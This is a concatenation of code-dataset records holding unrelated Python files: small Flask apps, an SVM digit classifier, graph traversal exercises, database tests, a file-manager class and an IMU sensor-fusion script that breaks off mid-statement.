print('\\n'.join(matches))\n\nelse:\n print('No phone numbers of email addresses found.')\n","sub_path":"python/03AutomateTheBoringStuffWithPython/07PatternMatchingWithRegularExpressions/Chapter7PhoneNumberAndEmailAddressExtractor.py","file_name":"Chapter7PhoneNumberAndEmailAddressExtractor.py","file_ext":"py","file_size_in_byte":1957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"109183757","text":"'''\n\nRun extra electron ID algorithms.\n\nOriginal author: M. Bachtis\n\n'''\n\nimport FWCore.ParameterSet.Config as cms\n\nfrom EGamma.EGammaAnalysisTools.electronIdMVAProducer_cfi import \\\n mvaTrigV0, mvaNonTrigV0\n\nrecoElectronID = cms.Sequence(\n mvaTrigV0 + mvaNonTrigV0\n)\n\n# For PAT\nelectronIDSources = cms.PSet(\n\tcicLoose = cms.InputTag(\"eidLoose\"),\n\tcicTight = cms.InputTag(\"eidTight\"),\n mvaTrigV0 = cms.InputTag(\"mvaTrigV0\"),\n mvaNonTrigV0 = cms.InputTag(\"mvaNonTrigV0\"),\n)\n","sub_path":"PatTools/python/electrons/electronID_cff.py","file_name":"electronID_cff.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"442350340","text":"from ..models import Buy, BuyItem\nfrom itertools import groupby\nfrom datetime import datetime\n\n# 발주생성, 제약사별 그룹핑\ndef create_buy(date=datetime.now()):\n\tincart = BuyItem.objects.filter(buy__isnull=True).order_by('drug__account')\n\tfor g, items in groupby(incart, lambda x:x.drug.account):\n\t\tbuy = Buy.objects.create(date=date)\n\t\tfor item in items:\n\t\t\tbuy.buyitem_set.add(item)\n\treturn buy\n\n\n\n\n","sub_path":"buy/modules/dbwork.py","file_name":"dbwork.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"520322954","text":"from flask import render_template, flash, redirect\nfrom app import app\nfrom .forms import InformationForm\nimport os\nfrom .getProfessionalInfoPTBR import Get_Professinal_PTBR\nfrom .getGenderInfoPTBR import GetGender_PTBR\nfrom .getAgeInfoPTBR import GetAge_PTBR\n\n\n@app.route('/')\n@app.route('/index')\ndef index():\n user = {'nickname': 'Miguel'}\n posts = [\n {\n 'author': {'nickname': 'John'},\n 'body': 'Beautiful day in Portland!'\n },\n {\n 'author': {'nickname': 'Susan'},\n 'body': 'The Avengers movie was so cool!'\n }\n ]\n return render_template('index.html',\n title='Home',\n user=user,\n posts=posts)\n\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n form = InformationForm()\n if form.validate_on_submit():\n flash('Login requested for name=\"%s\", textComment=%s' %\n (form.name.data, form.textComment.data))\n \n \n frase = form.textComment.data\n name = form.name.data\n\n test_prof = Get_Professinal_PTBR()\n test_age = GetAge_PTBR()\n test_gender = GetGender_PTBR()\n\n result = test_prof.get_profession(frase)\n # print(result)\n\n result = test_age.get_age(frase)\n # print(result)\n\n result = test_gender.get_gender(frase)\n\n profissao = test_prof.get_profession(frase)\n \n return str('o nome é ' + test_gender.get_gender_name(name) + '. ' + 'A profissao é '+ str(profissao))\n\n # se nao funcionar, descomentar a linha abaixo \n# return redirect('/index')\n\n \n return render_template('login.html',\n title='Teste de Engenharia Linguística',\n form=form,\n providers=app.config['OPENID_PROVIDERS'])\n","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"248772473","text":"import pytest\nfrom immudb.client import ImmudbClient\nfrom random import randint\nimport grpc._channel\nimport google.protobuf.empty_pb2\n\n\nclass TestDatabase:\n\n def test_list_use(self, client):\n resp = client.databaseList()\n assert \"defaultdb\" in resp\n resp = client.databaseUse(b\"defaultdb\")\n assert type(resp.reply.token) == str\n\n # create a new DB with a random name (must be lowercase)\n newdb = \"testdb{:04x}\".format(randint(0, 65536)).encode('utf8')\n resp = client.databaseCreate(newdb)\n assert type(resp.reply) == google.protobuf.empty_pb2.Empty\n # try and use the new DB\n resp = client.databaseUse(newdb)\n assert type(resp.reply.token) == str\n\n key = \"test_key_{:04d}\".format(randint(0, 10000))\n value = \"test_value_{:04d}\".format(randint(0, 10000))\n\n resp = client.verifiedSet(key.encode('utf8'), value.encode('utf8'))\n assert resp.verified == True\n readback = client.verifiedGet(key.encode('utf8'))\n assert readback.verified == True\n assert value.encode('utf8') == readback.value\n","sub_path":"tests/immu/test_database.py","file_name":"test_database.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"2818031","text":"def fib_digit(n: int) -> int:\n \"\"\"This function calculates the last digit of the n-th Fibonacci number.\n Where n is integer number 1 <= n <= 10^7\"\"\"\n assert n > 0\n a: int = 0\n b: int = 1\n for _ in range(2, n + 1):\n a, b = b, (a + b) % 10\n return b\n\n\ndef main() -> None:\n n: int = int(input())\n print(fib_digit(n))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"fibonacci_numbers/fib_last_digit.py","file_name":"fib_last_digit.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"448938637","text":"from flask import Flask, render_template, request, redirect, url_for\r\nfrom werkzeug import secure_filename\r\nimport pandas as pd \r\nfrom sklearn.svm import SVC\r\nfrom sklearn.preprocessing import StandardScaler\r\nimport logging\r\nimport logging.handlers\r\nimport joblib \r\nfrom openpyxl import Workbook\r\n\r\napp = Flask(__name__)\r\n\r\ndef savepickle(data, filename):\r\n \"\"\"Saves the data into pickle format\"\"\"\r\n # save_documents = open(filename +'.pickle', 'wb')\r\n joblib.dump(data, filename)\r\n # save_documents.close()\r\n\r\ndef loadpickle(data_filepath):\r\n #Loads up the pickled dataset for further parsing and preprocessing\r\n # documents_f = open(data_filepath+'.pickle', 'rb')\r\n data = joblib.load(data_filepath)\r\n # documents_f.close()\r\n \r\n return data\r\n\r\ndef train():\r\n \r\n data_path = \"train.csv\"\r\n df = pd.read_csv(data_path)\r\n\r\n scaler = StandardScaler()\r\n scaler.fit(df.ix[1:30000,1:785])\r\n\r\n X_train =scaler.transform(df.ix[1:30000,1:785])\r\n y_train =df.ix[1:30000,0:1]\r\n\r\n print('using support vector machines : ')\r\n SVM = SVC().fit(X_train , y_train)\r\n print('accuracy on training set : ',SVM.score(X_train,y_train))\r\n savepickle(SVM,'model.pkl')\r\n\r\n\r\ndef test(SVM):\r\n data_path = \"test.csv\"\r\n test = pd.read_csv(data_path)\r\n\r\n scaler = StandardScaler()\r\n scaler.fit(test.ix[:,:])\r\n\r\n ans = []\r\n index =[]\r\n i= 0\r\n while i<280:\r\n X_test = scaler.transform(test.ix[i:i,0:784])\r\n predicted_value = SVM.predict(X_test)\r\n ans.append(predicted_value[0])\r\n print('predicted value: ',predicted_value[0])\r\n index.append(i+1)\r\n i = i +1\r\n df = pd.DataFrame({'ImageId': index, 'Label': ans})\r\n df.to_excel('submit.xlsx', sheet_name='sheet1', index=False)\r\n\r\n@app.route('/')\r\ndef form():\r\n return render_template('hello.html')\r\n\r\n@app.route('/',methods=['POST'])\r\ndef form_post():\r\n text= request.form['text']\r\n tt = text.upper()\r\n if (tt=='YES'):\r\n return redirect(url_for('upload_file')) \r\n elif (tt=='NO'):\r\n return redirect(url_for('upload_file1')) \r\n\r\n@app.route('/upload')\r\ndef upload_file():\r\n return render_template('upload.html')\r\n@app.route('/test')\r\ndef upload_file1():\r\n return render_template('upload1.html')\t\r\n\r\n@app.route('/uploader', methods = ['GET', 'POST'])\r\ndef upload_file2():\r\n if request.method == 'POST':\r\n f = request.files['file']\r\n print(f.filename)\r\n f.filename = 'train.csv'\r\n f.save(secure_filename(f.filename))\r\n train()\r\n \r\n return render_template('hello.html')\t\r\n\r\n@app.route('/uploader1', methods = ['GET', 'POST'])\r\ndef upload_file3():\r\n if request.method == 'POST':\r\n f = request.files['file']\r\n f.filename = 'test.csv'\r\n f.save(secure_filename(f.filename))\r\n #train()\r\n mod = loadpickle('model.pkl')\r\n test(mod)\r\n #return (\"file uploaded successfully\")\r\n return render_template('hello.html')\r\n\r\n\r\nif __name__ == '__main__':\r\n handler = logging.handlers.RotatingFileHandler('logs/server.log',maxBytes=1024 * 1024)\r\n #handler.setFormatter(formatter)\r\n logging.getLogger('werkzeug').setLevel(logging.DEBUG)\r\n logging.getLogger('werkzeug').addHandler(handler)\r\n app.logger.setLevel(logging.WARNING)\r\n app.logger.addHandler(handler)\r\n app.run(host='0.0.0.0', debug=True)","sub_path":"Hello.py","file_name":"Hello.py","file_ext":"py","file_size_in_byte":3310,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"579106407","text":"from visbeat.AObject import *\n#import shutil\nfrom distutils.dir_util import copy_tree\n\n\nclass AFileManager(AObject):\n \"\"\"AFileManager (class): Manages assets. This should really be replaced with a database of some sort...\n Attributes:\n todo\n \"\"\"\n\n @staticmethod\n def AOBJECT_TYPE():\n return 'AFileManager'\n\n def getJSONPath(self):\n return self.getPath()\n\n def __init__(self, path=None, clear_temp=None):\n \"\"\"If you provide a directory, it will look for a existing AFileManager.json in that directory, or create one if it does not already exist.\n If you provide a json, it will use that json, unless the json doesn't exist, in which case it will complain...\n \"\"\"\n AObject.__init__(self, path=path)\n # self.initializeBlank()\n self.initWithPath(path=path, clear_temp=clear_temp)\n\n def initializeBlank(self):\n AObject.initializeBlank(self)\n self.directories = {}\n\n def getJSONName(self):\n return self.AOBJECT_TYPE()+\".json\"\n\n def initWithPath(self, path=None, clear_temp=None):\n oldpath = None\n newpath = path\n if(path):\n if(os.path.isfile(path)):\n self.loadFromJSON(self.getJSONPath()) #assume path property is already set to 'path'\n oldpath = self.getPath() #whatever was in the json, having overwritten path property\n elif(os.path.isdir(path)):\n json_file_path = path+os.sep+self.getJSONName()\n self.setPath(json_file_path)\n if(os.path.isfile(self.getJSONPath())):\n self.loadFromJSON(json_file_path)\n oldpath = self.getPath()\n newpath = json_file_path\n # self.setPath(file_path=json_file_path)\n else:\n newpath=self.getJSONPath()\n self.writeToJSON(json_path=newpath)#no json file found, so we create one\n else:\n assert False, \"Given AFileManager path is neither an existing directory or file! path: {} (AFileManager.py)\".format(path)\n\n self.setPath(file_path=newpath)\n\n if(oldpath):\n oldir = get_dir_from_path(pathstring(oldpath))\n newdir = get_dir_from_path(pathstring(newpath))\n if(oldir != newdir):\n AWARN(\"FILEMANAGER FOUND FILE MOVED FROM:\\n{}\\nTO:\\n{}\\nUPDATING DIRECTORIES...\".format(oldir,\n newdir))\n for d in self.directories:\n dpth = self.directories[d]\n if(dpth.startswith(oldir)):\n dpthst = dpth.lstrip(oldir)\n self.directories[d]=os.path.join(newdir,dpthst)\n AWARN(\"{} updated to {}\".format(dpth, self.directories[d]))\n\n\n self.setDir('data', pathstring(self.getDirectoryPath()+os.sep+\"Data\"+os.sep))\n self.setDir('backup', pathstring(self.getDir('data')+\"Backups\"+os.sep))\n self.setDir('temp', pathstring(self.getDir('data')+\"TEMP\"+os.sep))\n temp_dir = self.getDir('temp')\n if(os.path.isdir(temp_dir) and (clear_temp)):\n for the_file in os.listdir(temp_dir):\n file_path = os.path.join(temp_dir, the_file)\n try:\n if os.path.isfile(file_path):\n os.remove(file_path)\n #os.unlink(file_path)\n #elif os.path.isdir(file_path): shutil.rmtree(file_path)\n except Exception as e:\n print(e)\n make_sure_path_exists(temp_dir)\n #Video.VIDEO_TEMP_DIR = temp_dir\n\n def setDir(self, name, path):\n # AWARN(\"setting {} to {}\".format(name, path))\n # assert(name is not 'log')\n self.directories[name]=path\n make_sure_path_exists(path)\n return path\n\n def addDir(self, name):\n assert(name not in self.directories), \"tried to add {} dir to AFileManager, but this dir is already set\"\n return self.setDir(name, pathstring(self.getDirectoryPath()+os.sep+name+os.sep))\n\n def getDir(self, name):\n # printDictionary(self.directories)\n return self.directories.get(name)\n\n\n def emptyDir(self, name):\n dpth = self.getDir(name)\n if(dpth is not None and os.path.isdir(dpth)):\n shutil.rmtree(dpth)\n make_sure_path_exists(dpth)\n\n def deleteDir(self, name):\n dpth = self.getDir(name)\n if (dpth is not None and os.path.isdir(dpth)):\n shutil.rmtree(dpth)\n d = dict(self.directories)\n del d[name]\n self.directories=d\n\n\n def toDictionary(self):\n d = AObject.toDictionary(self)\n d['directories']=self.directories\n #serialize class specific members\n return d\n\n def copyPathToDir(self, path_to_copy, dest_dir):\n dest_path = self.getDir(dest_dir)\n if(dest_path):\n if(os.path.isdir(path_to_copy)):\n copy_tree(src=path_to_copy, dst=dest_path)\n elif(os.path.isfile(path_to_copy)):\n shutil.copy2(path_to_copy, dest_path)\n return\n\n def copyDirToPath(self, dir_to_copy, dest_path):\n src_path = self.getDir(dir_to_copy)\n if(src_path):\n if(os.path.isdir(dest_path)):\n copy_tree(src=src_path, dst=dest_path)\n return\n\n @staticmethod\n def copyRandomFractionOfFilesInSourceDir(source_dir, dest_dir, fraction=1.0, ext=None):\n \"\"\"\n Copies a random fraction of files in source directory... Wrote this for splitting training/test data in ML applications.\n :param source_dir:\n :param dest_dir:\n :param fraction:\n :param ext:\n :return:\n \"\"\"\n directories = []\n subdirnames = []\n filepaths = []\n for filename in os.listdir(source_dir):\n path = os.path.join(source_dir, filename)\n if os.path.isdir(path):\n directories.append(path)\n subdirnames.append(filename)\n else:\n # namepart, extpart = os.path.splitext(filename)\n if((ext is None) or filename.lower().endswith(ext)):\n filepaths.append(path)\n\n n_to_copy = int(len(filepaths)*fraction)\n random_seed = 0\n random.seed(random_seed)\n random.shuffle(filepaths)\n copy_sources = filepaths[:n_to_copy]\n for src, dst in zip(copy_sources, [dest_dir]*len(copy_sources)):\n #print(\"src: {}\\ndst: {}\".format(src, dst))\n shutil.copy2(src, dst)\n\n for d in range(len(directories)):\n subdest = pathstring(os.path.join(dest_dir,subdirnames[d])+os.sep)\n make_sure_dir_exists(subdest)\n AFileManager.copyRandomFractionOfFilesInSourceDir(source_dir=directories[d], dest_dir=subdest, fraction=fraction, ext=ext)\n\n def initFromDictionary(self, d):\n AObject.initFromDictionary(self, d)\n self.directories = d['directories']\n\n def save(self):\n if(os.path.isfile(self.getJSONPath())):\n os.rename(self.getJSONPath(), self.getDir('backup')+os.sep+self.AOBJECT_TYPE()+\".json\")\n self.writeToJSON(self.getJSONPath())\n","sub_path":"visbeat/AFileManager.py","file_name":"AFileManager.py","file_ext":"py","file_size_in_byte":7473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"354484376","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nApril 2018\nS3#\n\"\"\"\n\nfrom algopy import graph, graphmat, queue\n\ndef degrees(G):\n Din = [0] * G.order\n Dout = [0] * G.order\n for s in range(G.order):\n Dout[s] = len(G.adjlists[s])\n for adj in G.adjlists[s]:\n Din[adj] += 1\n \n return (Din, Dout)\n\ndef degreesMat(G):\n (din, dout) = (0, 0)\n for s in range(G.order):\n din_s, dout_s = 0, 0\n for adj in range(G.order):\n dout_s += G.adj[s][adj]\n din_s += G.adj[adj][s]\n din = max(din, din_s)\n dout = max(dout, dout_s)\n \n return (din, dout)\n\n\n\ndef __BFS(G, s, p):\n q = queue.Queue()\n q.enqueue(s)\n p[s] = -1\n while not q.isempty():\n s = q.dequeue()\n print(s)\n for adj in G.adjlists[s]:\n if p[adj] == None:\n q.enqueue(adj)\n p[adj] = s\n\ndef BFS(G):\n p = [None] * G.order\n for s in range(G.order):\n if p[s] is None:\n __BFS(G, s, p)\n return p\n\n\ndef __DFS(G, s, M):\n M[s] = True\n for adj in G.adjlists[s]:\n if not M[adj]:\n __DFS(G, adj, M)\n\ndef DFS(G):\n M = [False] * G.order\n for s in range(G.order):\n if not M[s]:\n __DFS(G, s, M)\n\n","sub_path":"S3/graphs_basics.py","file_name":"graphs_basics.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"75910088","text":"\r\n\r\n# http://www.tuicool.com/articles/RjIJF3\r\n\r\nimport tornado.ioloop\r\nfrom tornado.httpclient import AsyncHTTPClient\r\n\r\n# 用法很简单,这里的handle_reques是回调,\r\n# 也就是说,我访问了后产生了io堵塞,我会扔到后面,他自己搞定了后,直接会去调用handle_request的函数。\r\n\r\ndef handle_request(response):\r\n\t'''callback needed when a response arrive'''\r\n\tif response.error:\r\n\t\tprint (\"Error:\", response.error)\r\n\telse:\r\n\t\tprint ('called')\r\n\t\tprint (response.body)\r\nhttp_client = AsyncHTTPClient() # we initialize our http client instance\r\nhttp_client.fetch(\"http://www.baidu.com\", handle_request) # here we try\r\n\t\t\t\t\t# to fetch an url and delegate its response to callback\r\ntornado.ioloop.IOLoop.instance().start() # start the tornado ioloop to\r\n\t\t\t\t\t# listen for events","sub_path":"a-start/008_tornado/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"122140273","text":"####################################################################################\n#\n# Program dependancies the IMU must circuit must be placed either facing up\n# or facing down for accurate initialization process. Depending on up/down\n# several lines of codes need to be commented out or used. These sections\n# of code are titled:\n# ##########Direction Requirement###########\n# for the purposes of this project which used the Adafruit 10-DOF the unit\n# is considered upside down if the IC's on the IMU are facing the direction\n# of the earth. Right side up is IC's facing the sky.\n#\n####################################################################################\n\n\nimport sys\nimport smbus\nimport time\nimport math\nfrom LSM303_U import *\nfrom L3GD20_GYRO import *\nimport datetime\nbus = smbus.SMBus(1)\n\nRAD_TO_DEG = 57.29578\nM_PI = 3.14159265358979323846\nG_GAIN = 0.070 # [deg/s/LSB] If you change the dps for gyro, you need to update this value accordingly\nAA = 0.40 # Complementary filter constant\n\n#Kalman filter variables\nQ_angle = 0.02\nQ_gyro = 0.0015\nR_angle = 0.005\nx_bias = y_bias = 0.0\nXP_00 = XP_01 = XP_10 = XP_11 = 0.0\nYP_00 = YP_01 = YP_10 = YP_11 = 0.0\nKFangleX = KFangleY = 0.0\n\ndef kalmanFilterY ( accAngle, gyroRate, DT):\n\ty=0.0\n\tS=0.0\n\n\tglobal KFangleY\n\tglobal Q_angle\n\tglobal Q_gyro\n\tglobal y_bias\n\tglobal YP_00\n\tglobal YP_01\n\tglobal YP_10\n\tglobal YP_11\n\n\tKFangleY = KFangleY + DT * (gyroRate - y_bias)\n\n\tYP_00 = YP_00 + ( - DT * (YP_10 + YP_01) + Q_angle * DT )\n\tYP_01 = YP_01 + ( - DT * YP_11 )\n\tYP_10 = YP_10 + ( - DT * YP_11 )\n\tYP_11 = YP_11 + ( + Q_gyro * DT )\n\n\ty = accAngle - KFangleY\n\tS = YP_00 + R_angle\n\tK_0 = YP_00 / S\n\tK_1 = YP_10 / S\n\t\n\tKFangleY = KFangleY + ( K_0 * y )\n\ty_bias = y_bias + ( K_1 * y )\n\t\n\tYP_00 = YP_00 - ( K_0 * YP_00 )\n\tYP_01 = YP_01 - ( K_0 * YP_01 )\n\tYP_10 = YP_10 - ( K_1 * YP_00 )\n\tYP_11 = YP_11 - ( K_1 * YP_01 )\n\t\n\treturn KFangleY\n\ndef kalmanFilterX ( accAngle, gyroRate, DT):\n\tx=0.0\n\tS=0.0\n\n\tglobal KFangleX\n\tglobal Q_angle\n\tglobal Q_gyro\n\tglobal x_bias\n\tglobal XP_00\n\tglobal XP_01\n\tglobal XP_10\n\tglobal XP_11\n\n\n\tKFangleX = KFangleX + DT * (gyroRate - x_bias)\n\n\tXP_00 = XP_00 + ( - DT * (XP_10 + XP_01) + Q_angle * DT )\n\tXP_01 = XP_01 + ( - DT * XP_11 )\n\tXP_10 = XP_10 + ( - DT * XP_11 )\n\tXP_11 = XP_11 + ( + Q_gyro * DT )\n\n\tx = accAngle - KFangleX\n\tS = XP_00 + R_angle\n\tK_0 = XP_00 / S\n\tK_1 = XP_10 / S\n\t\n\tKFangleX = KFangleX + ( K_0 * x )\n\tx_bias = x_bias + ( K_1 * x )\n\t\n\tXP_00 = XP_00 - ( K_0 * XP_00 )\n\tXP_01 = XP_01 - ( K_0 * XP_01 )\n\tXP_10 = XP_10 - ( K_1 * XP_00 )\n\tXP_11 = XP_11 - ( K_1 * XP_01 )\n\t\n\treturn KFangleX\n\n'''\ndef writeRegisterAxis(Address, register, value):\n\tbus.write_byte_data(Address, register, value)\n\treturn -1\n'''\n\ndef writeACC(register,value):\n bus.write_byte_data(LSM303_ADDRESS_ACCEL , register, value)\n return -1\n\ndef writeMAG(register,value):\n bus.write_byte_data(LSM303_ADDRESS_MAG, register, value)\n return -1\n\ndef writeGRY(register,value):\n bus.write_byte_data(L3GD20_ADDRESS_GYRO, register, value)\n return -1\n\n'''\ndef readACCAxis(axis):\n reg = LSM303_ACCEL_OUT_X_L_A\n if axis == 'x':\n acc_l = bus.read_byte_data(LSM303_ADDRESS_ACCEL, reg) \n acc_h = bus.read_byte_data(LSM303_ADDRESS_ACCEL, reg + 1) \n elif axis == 'y':\n acc_l = bus.read_byte_data(LSM303_ADDRESS_ACCEL, reg + 2)\n acc_h = bus.read_byte_data(LSM303_ADDRESS_ACCEL, reg + 3)\n else: #axis == 'z': #implied since only 3 possible values\n acc_l = bus.read_byte_data(LSM303_ADDRESS_ACCEL, reg + 4)\n acc_h = bus.read_byte_data(LSM303_ADDRESS_ACCEL, reg + 5)\n \n\tacc_combined = (acc_l | acc_h <<8)\n\treturn acc_combined if acc_combined < 32768 else acc_combined - 65536\n\ndef readMAGAxis(axis):\n reg = LSM303_MAG_OUT_X_H_M\n if axis == 'x':\n mag_h = bus.read_byte_data(LSM303_ADDRESS_MAG, reg) \n mag_l = bus.read_byte_data(LSM303_ADDRESS_MAG, reg + 1) \n elif axis == 'z':\n mag_h = bus.read_byte_data(LSM303_ADDRESS_MAG, reg + 2)\n mag_l = bus.read_byte_data(LSM303_ADDRESS_MAG, reg + 3)\n else: #axis == 'y' #implied since only 3 possible values\n mag_h = bus.read_byte_data(LSM303_ADDRESS_MAG, reg + 4)\n mag_l = bus.read_byte_data(LSM303_ADDRESS_MAG, reg + 5)\n \n\tmag_combined = (mag_l | mag_h <<8)\n\treturn mag_combined if mag_combined < 32768 else mag_combined - 65536\n\ndef readGYRAxis(axis):\n reg = L3GD20_OUT_X_L\n if axis == 'x':\n gyr_l = bus.read_byte_data(L3GD20_ADDRESS_GYRO, reg)\n gyr_h = bus.read_byte_data(L3GD20_ADDRESS_GYRO, reg + 1)\n elif axis == 'y':\n gyr_l = bus.read_byte_data(L3GD20_ADDRESS_GYRO, reg + 2)\n gyr_h = bus.read_byte_data(L3GD20_ADDRESS_GYRO, reg + 3)\n else: #axis == 'z'\n gyr_l = bus.read_byte_data(L3GD20_ADDRESS_GYRO, reg + 4)\n gyr_h = bus.read_byte_data(L3GD20_ADDRESS_GYRO, reg + 5)\n\n gyr_combined = (gyr_l | gyr_h <<8)\n return gyr_combined if gyr_combined < 32768 else gyr_combined - 65536\n'''\n\ndef readACCx():\n acc_l = bus.read_byte_data(LSM303_ADDRESS_ACCEL, LSM303_ACCEL_OUT_X_L_A)\n acc_h = bus.read_byte_data(LSM303_ADDRESS_ACCEL, LSM303_ACCEL_OUT_X_H_A)\n acc_combined = (acc_l | acc_h <<8)\n\n return acc_combined if acc_combined < 32768 else acc_combined - 65536\n\n\ndef readACCy():\n acc_l = bus.read_byte_data(LSM303_ADDRESS_ACCEL, LSM303_ACCEL_OUT_Y_L_A)\n acc_h = bus.read_byte_data(LSM303_ADDRESS_ACCEL, LSM303_ACCEL_OUT_Y_H_A)\n acc_combined = (acc_l | acc_h <<8)\n\n return acc_combined if acc_combined < 32768 else acc_combined - 65536\n\n\ndef readACCz():\n acc_l = bus.read_byte_data(LSM303_ADDRESS_ACCEL, LSM303_ACCEL_OUT_Z_L_A)\n acc_h = bus.read_byte_data(LSM303_ADDRESS_ACCEL, LSM303_ACCEL_OUT_Z_H_A)\n acc_combined = (acc_l | acc_h <<8)\n\n return acc_combined if acc_combined < 32768 else acc_combined - 65536\n\n\ndef readMAGx():\n mag_l = bus.read_byte_data(LSM303_ADDRESS_MAG, LSM303_MAG_OUT_X_L_M)\n mag_h = bus.read_byte_data(LSM303_ADDRESS_MAG, LSM303_MAG_OUT_X_H_M)\n mag_combined = (mag_l | mag_h <<8)\n\n return mag_combined if mag_combined < 32768 else mag_combined - 65536\n\n\ndef readMAGy():\n mag_l = bus.read_byte_data(LSM303_ADDRESS_MAG, LSM303_MAG_OUT_Y_L_M)\n mag_h = bus.read_byte_data(LSM303_ADDRESS_MAG, LSM303_MAG_OUT_Y_H_M)\n mag_combined = (mag_l | mag_h <<8)\n\n return mag_combined if mag_combined < 32768 else mag_combined - 65536\n\n\ndef readMAGz():\n mag_l = bus.read_byte_data(LSM303_ADDRESS_MAG, LSM303_MAG_OUT_Z_L_M)\n mag_h = bus.read_byte_data(LSM303_ADDRESS_MAG, LSM303_MAG_OUT_Z_H_M)\n mag_combined = (mag_l | mag_h <<8)\n\n return mag_combined if mag_combined < 32768 else mag_combined - 65536\n\n\n\ndef readGYRx():\n gyr_l = bus.read_byte_data(L3GD20_ADDRESS_GYRO, L3GD20_OUT_X_L)\n gyr_h = bus.read_byte_data(L3GD20_ADDRESS_GYRO, L3GD20_OUT_X_H)\n gyr_combined = (gyr_l | gyr_h <<8)\n\n return gyr_combined if gyr_combined < 32768 else gyr_combined - 65536\n \n\ndef readGYRy():\n gyr_l = bus.read_byte_data(L3GD20_ADDRESS_GYRO, L3GD20_OUT_Y_L)\n gyr_h = bus.read_byte_data(L3GD20_ADDRESS_GYRO, L3GD20_OUT_Y_H)\n gyr_combined = (gyr_l | gyr_h <<8)\n\n return gyr_combined if gyr_combined < 32768 else gyr_combined - 65536\n\ndef readGYRz():\n gyr_l = bus.read_byte_data(L3GD20_ADDRESS_GYRO, L3GD20_OUT_Z_L)\n gyr_h = bus.read_byte_data(L3GD20_ADDRESS_GYRO, L3GD20_OUT_Z_H)\n gyr_combined = (gyr_l | gyr_h <<8)\n\n return gyr_combined if gyr_combined < 32768 else gyr_combined - 65536\n\n'''\n#initialise the accelerometer\nwriteRegisterAxis(LSM303_ADDRESS_ACCEL, LSM303_ACCEL_CTRL_REG1_A, 0b01100111) #z,y,x axis enabled, continuos update, 100Hz data rate\nwriteRegisterAxis(LSM303_ADDRESS_ACCEL, LSM303_ACCEL_CTRL_REG2_A, 0b00100000) #+/- 16G full scale\n\n#initialise the magnetometer\nwriteRegisterAxis(LSM303_ADDRESS_MAG, LSM303_CRA_REG_M, 0b11110000) #Temp enable, M data rate = 50Hz\nwriteRegisterAxis(LSM303_ADDRESS_MAG, LSM303_CRB_REG_M, 0b01100000) #+/-12gauss\nwriteRegisterAxis(LSM303_ADDRESS_MAG, LSM303_MR_REG_M, 0b00000000) #Continuous-conversion mode\n\n#initialise the gyroscope\nwriteRegisterAxis(L3GD20_ADDRESS_GYRO, L3GD20_CTRL_REG1, 0b00001111) #Normal power mode, all axes enabled\nwriteRegisterAxis(L3GD20_ADDRESS_GYRO, L3GD20_CTRL_REG4, 0b00110000) #Continuos update, 2000 dps full scale\n'''\n\n#initialise the accelerometer\nwriteACC(LSM303_ACCEL_CTRL_REG1_A, 0b01100111) #z,y,x axis enabled, continuos update, 100Hz data rate\nwriteACC(LSM303_ACCEL_CTRL_REG2_A, 0b00100000) #+/- 16G full scale\n\n#initialise the magnetometer\nwriteMAG(LSM303_CRA_REG_M, 0b11110000) #Temp enable, M data rate = 50Hz\nwriteMAG(LSM303_CRB_REG_M, 0b01100000) #+/-12gauss\nwriteMAG(LSM303_MR_REG_M, 0b00000000) #Continuous-conversion mode\n\n#initialise the gyroscope\nwriteGRY(L3GD20_CTRL_REG1, 0b00001111) #Normal power mode, all axes enabled\nwriteGRY(L3GD20_CTRL_REG4, 0b00110000) #Continuos update, 2000 dps full scale\n\n\ngyroXangle = gyroYangle = gyroZangle = 0.0\nCFangleX = CFangleY = 0.0\nkalmanX = kalmanY = 0.0\n\na = datetime.datetime.now() #Gyro Timing Control\n\n#n = 0\n\n#while True: #Continous run Disabled to allow Node.js control\n\n#for num in range(1,20):\t #Currently this loop runs for 20 reads providing greater accuracy\n\t\n\t#Read the accelerometer,gyroscope and magnetometer values\n'''\nACCx = readACCAxis('x')\nACCy = readACCAxis('y')\nACCz = readACCAxis('z')\nGYRx = readGYRAxis('x')\nGYRy = readGYRAxis('y')\nGYRz = readGYRAxis('z')\nMAGx = readMAGAxis('x')\nMAGy = readMAGAxis('y')\nMAGz = readMAGAxis('z')\n'''\nACCx = readACCx()\nACCy = readACCy()\nACCz = readACCz()\nGYRx = readGYRx()\nGYRy = readGYRy()\nGYRz = readGYRz()\nMAGx = readMAGx()\nMAGy = readMAGy()\nMAGz = readMAGz()\n\n##Calculate loop Period(LP). How long between Gyro Reads\nb = datetime.datetime.now() - a\na = datetime.datetime.now()\nLP = b.microseconds/(1000000*1.0)\n#print \"Loop Time | %5.2f|\" % ( LP ), #Error checking stop\n\n#Convert Gyro raw to degrees per second\nrate_gyr_x = GYRx * G_GAIN\nrate_gyr_y = GYRy * G_GAIN\nrate_gyr_z = GYRz * G_GAIN\n\n#Calculate the angles from the gyro. \ngyroXangle+=rate_gyr_x*LP\ngyroYangle+=rate_gyr_y*LP\ngyroZangle+=rate_gyr_z*LP\n\n\n##Convert Accelerometer values to degrees\nAccXangle = (math.atan2(ACCy,ACCz)+M_PI)*RAD_TO_DEG\nAccYangle = 